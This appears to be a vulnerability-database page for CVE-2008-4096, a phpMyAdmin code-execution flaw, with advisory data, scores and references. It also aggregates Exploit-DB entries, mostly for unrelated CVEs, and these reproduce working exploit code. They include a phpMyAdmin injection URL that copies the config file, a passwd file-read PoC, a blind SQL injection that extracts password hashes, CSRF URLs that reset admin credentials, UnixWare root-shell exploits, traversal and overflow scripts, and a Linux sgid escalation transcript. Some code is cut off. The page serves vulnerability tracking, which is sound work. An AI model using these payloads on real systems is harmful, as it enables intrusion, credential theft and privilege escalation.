CVE-2008-4096
Published 2008-09-18
Priority: P356 · high · CVSS 2.0: 8.5 (AV:N/AC:M/Au:S/C:C/I:C/A:C)
Exploit available
EPSS: 11.18% (95.4th percentile)
libraries/database_interface.lib.php in phpMyAdmin before 2.11.9.1 allows remote authenticated users to execute arbitrary code via a request to server_databases.php with a sort_by parameter containing PHP sequences, which are processed by create_function.
Affected
57 ranges (only the rows that carry version data are shown)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| debian | phpmyadmin | < phpmyadmin 4:2.11.8.1-2 (bookworm) | phpmyadmin 4:2.11.8.1-2 (bookworm) |
| phpmyadmin | phpmyadmin | <= 2.11.9 | — |
CVSS provenance
| Source | Score | Severity | Vector |
|---|---|---|---|
| nvd (v2.0) | 8.5 | HIGH | AV:N/AC:M/Au:S/C:C/I:C/A:C |
| osv | 8.5 | HIGH | — |
| vendor_debian | 8.5 | MEDIUM | — |
| vendor_redhat | 8.5 | HIGH | — |
Debian
CVE-2008-4096 [HIGH] phpmyadmin - libraries/database_interface.lib.php in phpMyAdmin before 2.11.9.1 allows remote...
vendor_debian · 2008 · CVSS 8.5
Scope: local
bookworm: resolved (fixed in 4:2.11.8.1-2)
bullseye: resolved (fixed in 4:2.11.8.1-2)
forky: resolved (fixed in 4:2.11.8.1-2)
sid: resolved (fixed in 4:2.11.8.1-2)
trixie: resolved (fixed in 4:2.11.8.1-2)
Red Hat
CVE-2008-4096 [HIGH] phpMyAdmin: Code execution vulnerability (< 2.11.9.1)
vendor_redhat · CVSS 8.5
GHSA
CVE-2008-4096 [HIGH] CWE-20 GHSA-j99q-43xw-28f9: libraries/database_interface
ghsa_unreviewed · 2022-05-02
OSV
CVE-2008-4096 [HIGH] CVE-2008-4096: libraries/database_interface
osv · 2008-09-18 · CVSS 8.5
No detection rules found.
Exploit-DB
CVE-2017-6371 [HIGH] Synchronet BBS 3.16c - Denial of Service
exploitdb · 2017-02-28 · CVSS 7.5
---
```python
# Exploit Title: Synchronet BBS 3.16c for Windows – Multiple vulnerabilities
# Date: 2017-02-28
# Exploit Author: Peter Baris
# Vendor Homepage: http://www.saptech-erp.com.au
# Software Link: ftp://synchro.net/Synchronet/sbbs316c.zip
# Version: 3.16c for Windows
# Tested on: Windows 7 Pro SP1 x64, Windows Server 2008 R2 Standard x64
# CVE : CVE-2017-6371
import socket
import time
import sys
try:
    host = sys.argv[1]
    port = 80
except IndexError:
    print "[+] Usage %s " % sys.argv[0]
    sys.exit()
exploit = "\x41"*4096
buffer = "GET /index.ssjs HTTP/1.1\r\n"
buffer+= "Host: 192.168.198.129\r\n"
buffer+= "User-Agent: Mozilla/5.0 (X11; Linux i686; rv:44.0) Gecko/20100101 Firefox/44.0 Iceweasel/44.0.2\r\n"
buffer+="Accept: text/html,application/xhtml
```
Exploit-DB
CVE-2008-4210 Linux Kernel < 2.6.22 - 'ftruncate()'/'open()' Local Privilege Escalation
exploitdb · 2008-10-27
---
Linux Kernel
bug information: http://osvdb.org/49081
!!!This is for educational purposes only!!!
To use it, you have to find an sgid directory you have permission to write into (obviously world-writable), e.g.:
find / -perm -2000 -type d 2>/dev/null|xargs ls -ld|grep "rwx"
which fortunately is not common these days :)
You also need a shell that does not drop sgid privs upon execution (like ash/sash).
E.g.:
```text
test:/fileserver/samba$ ls -ld
drwxrwsrwx 2 root root 4096 2008-10-27 16:27 .
test:/fileserver/samba$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
test:/fileserver/samba$ /tmp/gw-ftrex
ash shell found!
size=80200
We're evil evil evil!
$ id
uid=33(www-data) gid=33(www-data) egid=0(root) groups=33(www-data)
```
I ought to say something clever as a conclusion... but right now I can't
Exploit-DB
CVE-2008-4151 CYASK 3.x - 'neturl' Local File Disclosure
exploitdb · 2008-09-18
---
This vulnerability means that the attacker can read any file on your webserver once cyask is installed.
The $neturl variable in collect.php is not checked sufficiently. When the attacker registers a new user, he can pass
the user check and then submit any filename to $neturl so that collect.php reads it.
The vulnerable code looks like this:
```php
$url=get_referer();
$neturl=empty($_POST['neturl']) ? trim($_GET['neturl']) : trim($_POST['neturl']);
$collect_url=empty($neturl) ? $url : $neturl;
$contents = '';
if($fid=@fopen($collect_url,"r"))
{
    do
    {
        $data = fread($fid, 4096);
        if (strlen($data) == 0)
        {
            break;
        }
        $contents .= $data;
    }
    while(true);
    fclose($fid);
}
```
POC:
http://XXX.com/collect.php?neturl=../../../etc/passwd
# milw0rm.com [2008-09-18]
Exploit-DB
CVE-2008-4096 phpMyAdmin 3.2 - 'server_databases.php' Remote Command Execution
exploitdb · 2008-09-15
---
source: https://www.securityfocus.com/bid/31188/info
phpMyAdmin is prone to a vulnerability that attackers can leverage to execute arbitrary commands. This issue occurs because the application fails to adequately sanitize user-supplied input.
Successful attacks can compromise the affected application and possibly the underlying computer.
This issue affects versions prior to phpMyAdmin 2.11.9.1.
http://www.example.com/server_databases.php?pos=0&dbstats=0&sort_by="]) OR exec('cp $(pwd)"/config.inc.php" config.txt'); //&sort_order=desc&token=[valid token]
Exploit-DB
CVE-2008-5208 Joomla! Component Datsogallery 1.6 - Blind SQL Injection
exploitdb · 2008-05-10
---
```php
\n");
    fwrite($fs, $req);
    $res=fread($fs, 4096);
    fclose($fs);
    return $res;
}
function xpl($condition, $pos){
    global $norm_ua;
    global $where;
    $xpl=rand(1,100000)."'),(1,if(ascii(substring((select password from #__users $where),$pos,1))$condition,(select '$norm_ua'),(select link from #__menu)))/*";
    return $xpl;
}
//main
echo 'Joomla Component com_datsogallery 1.6 Blind SQL Injection Exploit by +toxa+';
if(empty($url)) die($_SERVER['SCRIPT_NAME']."?url=[url]&user=[username]&id=[pic_id]\nusername&pic_id - optional\n");
send_xpl($url, $norm_ua);
//get md5
for($i=0;$i58', $i));
if(preg_match('/Duplicate entry/', $buff)){
for($j=97;$j58', $i));
if(preg_match('/Duplicate entry/', $buff)){
$buff=send_xpl($url, xpl('>91',$i));
if(preg_
```
Exploit-DB
CVE-2008-6586 μTorrent (uTorrent) WebUI 0.310 Beta 2 - Cross-Site Request Forgery
exploitdb · 2008-04-18
---
source: https://www.securityfocus.com/bid/28847/info
uTorrent WebUI is prone to a cross-site request-forgery vulnerability.
Exploiting this issue may allow a remote attacker to execute arbitrary actions in the context of the affected application.
uTorrent WebUI 0.310 beta 2 is vulnerable; other versions may also be affected.
To force a file download:
http://www.example.com:8080/gui/?action=add-url&s=http://localhost/backdoor.torrent
To change administrative credentials and settings:
http://www.example.com:8080/gui/?action=setsetting&s=webui.username&v=badmin
http://www.example.com:8080/gui/?action=setsetting&s=webui.password&v=badmin
http://www.example.com:8080/gui/?action=setsetting&s=webui.port&v=4096 http://w
Exploit-DB
CVE-2008-6559 SCO UnixWare Merge - 'mcd' Local Privilege Escalation
exploitdb · 2008-04-04
---
```c
/* 04/2008: public release
 * I haven't seen any advisory on this; possibly still not fixed.
 *
 * SCO UnixWare Merge mcd Local Root Exploit
 * By qaaz
 */
#include
#include
#include
#include
#include
#include
#define TARGET "/usr/lib/merge/mcd"
#define DIR "/proc/%d/object", getpid()
#define BIN "a.out"
#define LNK "hrc;" BIN ";prc"
#define DEV "/dev/cdrom/cdrom1"
int main(int argc, char *argv[])
{
    char dir[4096], bin[4096];
    char dev[4096], env[4096];
    pid_t child;
    struct stat st;
    if (geteuid() == 0) {
        setuid(geteuid());
        setgid(getegid());
        if (strstr(argv[0], BIN)) {
            umask(0);
            chown(BIN, 0, 3);
            chmod(BIN, 06777);
            kill(getppid(), 15);
            return 0;
        }
        putenv("HISTFILE=/dev/null");
        execl("/bin/sh", "sh", "-i", NULL);
        printf("[-] sh: %s\n",
```
Exploit-DB
CVE-2008-6558 SCO UnixWare Reliant HA 1.1.4 - Local Privilege Escalation
exploitdb · 2008-04-04
---
```c
/* 04/2008: public release
 * I haven't seen any advisory on this; possibly still not fixed.
 *
 * SCO UnixWare Reliant HA Local Root Exploit
 * By qaaz
 */
#include
#include
#include
#include
#include
#include
#define TGT1 "/usr/opt/reliant/bin/hvdisp"
#define TGT2 "/usr/opt/reliant/bin/rcvm"
#define DIR "bin"
#define BIN DIR "/hvenv"
int main(int argc, char *argv[])
{
    char self[4096], *target;
    pid_t child;
    if (geteuid() == 0) {
        setuid(geteuid());
        dup2(3, 0);
        dup2(4, 1);
        dup2(5, 2);
        if ((child = fork()) == 0) {
            putenv("HISTFILE=/dev/null");
            execl("/bin/sh", "sh", "-i", NULL);
            printf("[-] sh: %s\n", strerror(errno));
        } else if (child != -1)
            waitpid(child, NULL, 0);
        kill(getppid(), 15);
        return 1;
    }
    printf("---------------------
```
Exploit-DB
CVE-2007-0919 MiniWebsvr 0.0.9a - Remote Directory Traversal
exploitdb · 2008-03-03
---
```python
import socket
import sys
print '---------------------------------------------------------'
print 'MiniWebSvr 0.0.9a Directory Transversal Vulnerability'
print 'Project URL: http://miniwebsvr.sourceforge.net/'
print 'Author: gbr'
print 'Tested on Windows XP SP2'
print '---------------------------------------------------------'
host = "127.0.0.1"
port = 8080
if sys.argv[1:]:
    host = sys.argv[1]
if sys.argv[2:]:
    port = int(sys.argv[2])
try:
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((host, port))
    s.send("GET /%../../../../../../../../../../../boot.ini HTTP/1.0\r\n\r\n")
    while True:
        data = s.recv(4096)
        if not data:
            break
        print data
except:
    print "Connection Error"
# milw0rm.com [2008-03-03]
```
No writeups or analysis indexed.
References
http://fd.the-wildcat.de/pma_e36a091q11.php
http://lists.opensuse.org/opensuse-security-announce/2009-02/msg00000.html
http://osvdb.org/48196
http://secunia.com/advisories/31884
http://secunia.com/advisories/31918
http://secunia.com/advisories/32034
http://secunia.com/advisories/33822
http://security.gentoo.org/glsa/glsa-200903-32.xml
http://typo3.org/teams/security/security-bulletins/typo3-20080916-1/
http://www.debian.org/security/2008/dsa-1641
http://www.mandriva.com/security/advisories?name=MDVSA-2008:202
http://www.nabble.com/phpMyAdmin-2.11.9.1-is-released-td19497113.html
http://www.openwall.com/lists/oss-security/2008/09/15/2
http://www.openwall.com/lists/oss-security/2008/09/16/2
http://www.phpmyadmin.net/home_page/security.php?issue=PMASA-2008-7
http://www.securityfocus.com/bid/31188
http://www.vupen.com/english/advisories/2008/2585
http://www.vupen.com/english/advisories/2008/2619
https://bugzilla.redhat.com/show_bug.cgi?id=462430
https://exchange.xforce.ibmcloud.com/vulnerabilities/45157
https://www.redhat.com/archives/fedora-package-announce/2008-September/msg01137.html
https://www.redhat.com/archives/fedora-package-announce/2008-September/msg01155.html
https://www.redhat.com/archives/fedora-package-announce/2008-September/msg01228.html
https://www.redhat.com/archives/fedora-package-announce/2008-September/msg01290.html